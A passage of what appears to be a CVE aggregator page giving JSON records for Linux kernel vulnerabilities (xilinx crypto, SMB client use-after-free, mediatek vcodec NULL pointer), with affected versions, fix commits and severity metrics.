crypto_finalize_request+0xa0/0x118 crypto_finalize_aead_request+0x18/0x30 zynqmp_handle_aes_req+0xcc/0x388 crypto_pump_work+0x168/0x2d8 kthread_worker_fn+0xfc/0x3a0 kthread+0x118/0x138 ret_from_fork+0x10/0x20 irq event stamp: 40 hardirqs last enabled at (39): [<ffffffc0812416f8>] _raw_spin_unlock_irqrestore+0x70/0xb0 hardirqs last disabled at (40): [<ffffffc08122d208>] el1_dbg+0x28/0x90 softirqs last enabled at (36): [<ffffffc080017dec>] kernel_neon_begin+0x8c/0xf0 softirqs last disabled at (34): [<ffffffc080017dc0>] kernel_neon_begin+0x60/0xf0 ---[ end trace 0000000000000000 ]---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8a01335aedc50a66d…
	https://git.kernel.org/stable/c/03e6d4e948432a61b…
	https://git.kernel.org/stable/c/a71f66bd5f7b9b35a…
	https://git.kernel.org/stable/c/23bc89fdce71124cd…
	https://git.kernel.org/stable/c/9db89b1fb85557892…
	https://git.kernel.org/stable/c/dbf291d8ffffb70f4…
	https://git.kernel.org/stable/c/a853450bf4c752e66…

Impacted products

Vendor

Product

Version

Linux

Affected: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 , < 8a01335aedc50a66d04dd39203c89f4bc8042596 (git)
Affected: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 , < 03e6d4e948432a61b35783323b6ab2be071d2619 (git)
Affected: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 , < a71f66bd5f7b9b35a8aaa49e29565eca66299399 (git)
Affected: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 , < 23bc89fdce71124cd2126fc919c7076e7cb489cf (git)
Affected: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 , < 9db89b1fb85557892e6681724b367287de5f9f20 (git)
Affected: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 , < dbf291d8ffffb70f48286176a15c6c54f0bb0743 (git)
Affected: 4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5 , < a853450bf4c752e664abab0b2fad395b7ad7701c (git)

Linux

Affected: 5.7
Unaffected: 0 , < 5.7 (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.426Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a01335aedc50a66d04dd39203c89f4bc8042596"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03e6d4e948432a61b35783323b6ab2be071d2619"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a71f66bd5f7b9b35a8aaa49e29565eca66299399"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/23bc89fdce71124cd2126fc919c7076e7cb489cf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9db89b1fb85557892e6681724b367287de5f9f20"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dbf291d8ffffb70f48286176a15c6c54f0bb0743"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a853450bf4c752e664abab0b2fad395b7ad7701c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26877",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:48:28.996233Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:26.216Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/crypto/xilinx/zynqmp-aes-gcm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8a01335aedc50a66d04dd39203c89f4bc8042596",
              "status": "affected",
              "version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
              "versionType": "git"
            },
            {
              "lessThan": "03e6d4e948432a61b35783323b6ab2be071d2619",
              "status": "affected",
              "version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
              "versionType": "git"
            },
            {
              "lessThan": "a71f66bd5f7b9b35a8aaa49e29565eca66299399",
              "status": "affected",
              "version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
              "versionType": "git"
            },
            {
              "lessThan": "23bc89fdce71124cd2126fc919c7076e7cb489cf",
              "status": "affected",
              "version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
              "versionType": "git"
            },
            {
              "lessThan": "9db89b1fb85557892e6681724b367287de5f9f20",
              "status": "affected",
              "version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
              "versionType": "git"
            },
            {
              "lessThan": "dbf291d8ffffb70f48286176a15c6c54f0bb0743",
              "status": "affected",
              "version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
              "versionType": "git"
            },
            {
              "lessThan": "a853450bf4c752e664abab0b2fad395b7ad7701c",
              "status": "affected",
              "version": "4d96f7d48131fefe30d7c1d1e2a23ef37164dbf5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/crypto/xilinx/zynqmp-aes-gcm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.7"
            },
            {
              "lessThan": "5.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: xilinx - call finalize with bh disabled\n\nWhen calling crypto_finalize_request, BH should be disabled to avoid\ntriggering the following calltrace:\n\n    ------------[ cut here ]------------\n    WARNING: CPU: 2 PID: 74 at crypto/crypto_engine.c:58 crypto_finalize_request+0xa0/0x118\n    Modules linked in: cryptodev(O)\n    CPU: 2 PID: 74 Comm: firmware:zynqmp Tainted: G           O       6.8.0-rc1-yocto-standard #323\n    Hardware name: ZynqMP ZCU102 Rev1.0 (DT)\n    pstate: 40000005 (nZcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n    pc : crypto_finalize_request+0xa0/0x118\n    lr : crypto_finalize_request+0x104/0x118\n    sp : ffffffc085353ce0\n    x29: ffffffc085353ce0 x28: 0000000000000000 x27: ffffff8808ea8688\n    x26: ffffffc081715038 x25: 0000000000000000 x24: ffffff880100db00\n    x23: ffffff880100da80 x22: 0000000000000000 x21: 0000000000000000\n    x20: ffffff8805b14000 x19: ffffff880100da80 x18: 0000000000010450\n    x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\n    x14: 0000000000000003 x13: 0000000000000000 x12: ffffff880100dad0\n    x11: 0000000000000000 x10: ffffffc0832dcd08 x9 : ffffffc0812416d8\n    x8 : 00000000000001f4 x7 : ffffffc0830d2830 x6 : 0000000000000001\n    x5 : ffffffc082091000 x4 : ffffffc082091658 x3 : 0000000000000000\n    x2 : ffffffc7f9653000 x1 : 0000000000000000 x0 : ffffff8802d20000\n    Call trace:\n     crypto_finalize_request+0xa0/0x118\n     crypto_finalize_aead_request+0x18/0x30\n     zynqmp_handle_aes_req+0xcc/0x388\n     crypto_pump_work+0x168/0x2d8\n     kthread_worker_fn+0xfc/0x3a0\n     kthread+0x118/0x138\n     ret_from_fork+0x10/0x20\n    irq event stamp: 40\n    hardirqs last  enabled at (39): [\u003cffffffc0812416f8\u003e] _raw_spin_unlock_irqrestore+0x70/0xb0\n    hardirqs last disabled at (40): [\u003cffffffc08122d208\u003e] el1_dbg+0x28/0x90\n    softirqs last  enabled at (36): [\u003cffffffc080017dec\u003e] kernel_neon_begin+0x8c/0xf0\n    softirqs last disabled at (34): [\u003cffffffc080017dc0\u003e] kernel_neon_begin+0x60/0xf0\n    ---[ end trace 0000000000000000 ]---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:58:39.909Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8a01335aedc50a66d04dd39203c89f4bc8042596"
        },
        {
          "url": "https://git.kernel.org/stable/c/03e6d4e948432a61b35783323b6ab2be071d2619"
        },
        {
          "url": "https://git.kernel.org/stable/c/a71f66bd5f7b9b35a8aaa49e29565eca66299399"
        },
        {
          "url": "https://git.kernel.org/stable/c/23bc89fdce71124cd2126fc919c7076e7cb489cf"
        },
        {
          "url": "https://git.kernel.org/stable/c/9db89b1fb85557892e6681724b367287de5f9f20"
        },
        {
          "url": "https://git.kernel.org/stable/c/dbf291d8ffffb70f48286176a15c6c54f0bb0743"
        },
        {
          "url": "https://git.kernel.org/stable/c/a853450bf4c752e664abab0b2fad395b7ad7701c"
        }
      ],
      "title": "crypto: xilinx - call finalize with bh disabled",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26877",
    "datePublished": "2024-04-17T10:27:35.197Z",
    "dateReserved": "2024-02-19T14:20:24.185Z",
    "dateUpdated": "2025-05-04T08:58:39.909Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35868 (GCVE-0-2024-35868)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2026-01-05 10:35

Title

smb: client: fix potential UAF in cifs_stats_proc_write()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF in cifs_stats_proc_write() Skip sessions that are being teared down (status == SES_EXITING) to avoid UAF.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8fefd166fcb368c5f…
	https://git.kernel.org/stable/c/cf03020c56d3ed28c…
	https://git.kernel.org/stable/c/5b5475ce69f02ecc1…
	https://git.kernel.org/stable/c/d3da25c5ac84430f8…

Impacted products

Vendor

Product

Version

Linux

Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 8fefd166fcb368c5fcf48238e3f7c8af829e0a72 (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < cf03020c56d3ed28c4942280957a007b5e9544f7 (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < 5b5475ce69f02ecc1b13ea23106e5b89c690429b (git)
Affected: 7f48558e6489d032b1584b0cc9ac4bb11072c034 , < d3da25c5ac84430f89875ca7485a3828150a7e0a (git)
Affected: a67172a013953664b1dad03c648200c70b90506c (git)

Linux

Affected: 3.13
Unaffected: 0 , < 3.13 (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35868",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:41:39.676254Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:13.203Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.077Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8fefd166fcb368c5fcf48238e3f7c8af829e0a72"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cf03020c56d3ed28c4942280957a007b5e9544f7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5b5475ce69f02ecc1b13ea23106e5b89c690429b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d3da25c5ac84430f89875ca7485a3828150a7e0a"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cifs_debug.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8fefd166fcb368c5fcf48238e3f7c8af829e0a72",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "cf03020c56d3ed28c4942280957a007b5e9544f7",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "5b5475ce69f02ecc1b13ea23106e5b89c690429b",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "lessThan": "d3da25c5ac84430f89875ca7485a3828150a7e0a",
              "status": "affected",
              "version": "7f48558e6489d032b1584b0cc9ac4bb11072c034",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a67172a013953664b1dad03c648200c70b90506c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cifs_debug.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.13"
            },
            {
              "lessThan": "3.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.12.48",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in cifs_stats_proc_write()\n\nSkip sessions that are being teared down (status == SES_EXITING) to\navoid UAF."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:35.913Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8fefd166fcb368c5fcf48238e3f7c8af829e0a72"
        },
        {
          "url": "https://git.kernel.org/stable/c/cf03020c56d3ed28c4942280957a007b5e9544f7"
        },
        {
          "url": "https://git.kernel.org/stable/c/5b5475ce69f02ecc1b13ea23106e5b89c690429b"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3da25c5ac84430f89875ca7485a3828150a7e0a"
        }
      ],
      "title": "smb: client: fix potential UAF in cifs_stats_proc_write()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35868",
    "datePublished": "2024-05-19T08:34:26.806Z",
    "dateReserved": "2024-05-17T13:50:33.108Z",
    "dateUpdated": "2026-01-05T10:35:35.913Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35919 (GCVE-0-2024-35919)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-05-04 09:08

Title

media: mediatek: vcodec: adding lock to protect encoder context list

Summary

In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: adding lock to protect encoder context list Add a lock for the ctx_list, to avoid accessing a NULL pointer within the 'vpu_enc_ipi_handler' function when the ctx_list has been deleted due to an unexpected behavior on the SCP IP block.

Severity ?

7 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/41671f0c0182b2bae…
	https://git.kernel.org/stable/c/51c84a8aac6e3b59a…
	https://git.kernel.org/stable/c/afaaf3a0f647a24a7…

Impacted products

Vendor

Product

Version

Linux

Affected: 1972e32431ed14682909ad568c6fd660572ae6ab , < 41671f0c0182b2bae74ca7e3b0f155559e3e2fc5 (git)
Affected: 1972e32431ed14682909ad568c6fd660572ae6ab , < 51c84a8aac6e3b59af2b0e92ba63cabe2e641a2d (git)
Affected: 1972e32431ed14682909ad568c6fd660572ae6ab , < afaaf3a0f647a24a7bf6a2145d8ade37baaf75ad (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "41671f0c0182",
                "status": "affected",
                "version": "1972e32431ed",
                "versionType": "custom"
              },
              {
                "lessThan": "51c84a8aac6e",
                "status": "affected",
                "version": "1972e32431ed",
                "versionType": "custom"
              },
              {
                "lessThan": "afaaf3a0f647",
                "status": "affected",
                "version": "1972e32431ed",
                "versionType": "custom"
              },
              {
                "status": "affected",
                "version": "6.6"
              },
              {
                "lessThan": "6.6*",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.6*",
                "status": "affected",
                "version": "6.6.27",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.8*",
                "status": "affected",
                "version": "6.8.6",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "*",
                "status": "affected",
                "version": "6.9",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35919",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-31T14:03:42.763507Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-31T14:08:27.502Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.013Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/41671f0c0182b2bae74ca7e3b0f155559e3e2fc5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/51c84a8aac6e3b59af2b0e92ba63cabe2e641a2d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/afaaf3a0f647a24a7bf6a2145d8ade37baaf75ad"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/platform/mediatek/vcodec/common/mtk_vcodec_fw_vpu.c",
            "drivers/media/platform/mediatek/vcodec/encoder/mtk_vcodec_enc_drv.c",
            "drivers/media/platform/mediatek/vcodec/encoder/mtk_vcodec_enc_drv.h",
            "drivers/media/platform/mediatek/vcodec/encoder/venc_vpu_if.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "41671f0c0182b2bae74ca7e3b0f155559e3e2fc5",
              "status": "affected",
              "version": "1972e32431ed14682909ad568c6fd660572ae6ab",
              "versionType": "git"
            },
            {
              "lessThan": "51c84a8aac6e3b59af2b0e92ba63cabe2e641a2d",
              "status": "affected",
              "version": "1972e32431ed14682909ad568c6fd660572ae6ab",
              "versionType": "git"
            },
            {
              "lessThan": "afaaf3a0f647a24a7bf6a2145d8ade37baaf75ad",
              "status": "affected",
              "version": "1972e32431ed14682909ad568c6fd660572ae6ab",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/platform/mediatek/vcodec/common/mtk_vcodec_fw_vpu.c",
            "drivers/media/platform/mediatek/vcodec/encoder/mtk_vcodec_enc_drv.c",
            "drivers/media/platform/mediatek/vcodec/encoder/mtk_vcodec_enc_drv.h",
            "drivers/media/platform/mediatek/vcodec/encoder/venc_vpu_if.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mediatek: vcodec: adding lock to protect encoder context list\n\nAdd a lock for the ctx_list, to avoid accessing a NULL pointer\nwithin the \u0027vpu_enc_ipi_handler\u0027 function when the ctx_list has\nbeen deleted due to an unexpected behavior on the SCP IP block."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:22.207Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/41671f0c0182b2bae74ca7e3b0f155559e3e2fc5"
        },
        {
          "url": "https://git.kernel.org/stable/c/51c84a8aac6e3b59af2b0e92ba63cabe2e641a2d"
        },
        {
          "url": "https://git.kernel.org/stable/c/afaaf3a0f647a24a7bf6a2145d8ade37baaf75ad"
        }
      ],
      "title": "media: mediatek: vcodec: adding lock to protect encoder context list",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35919",
    "datePublished": "2024-05-19T10:10:31.707Z",
    "dateReserved": "2024-05-17T13:50:33.123Z",
    "dateUpdated": "2025-05-04T09:08:22.207Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26894 (GCVE-0-2024-26894)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:59

Title

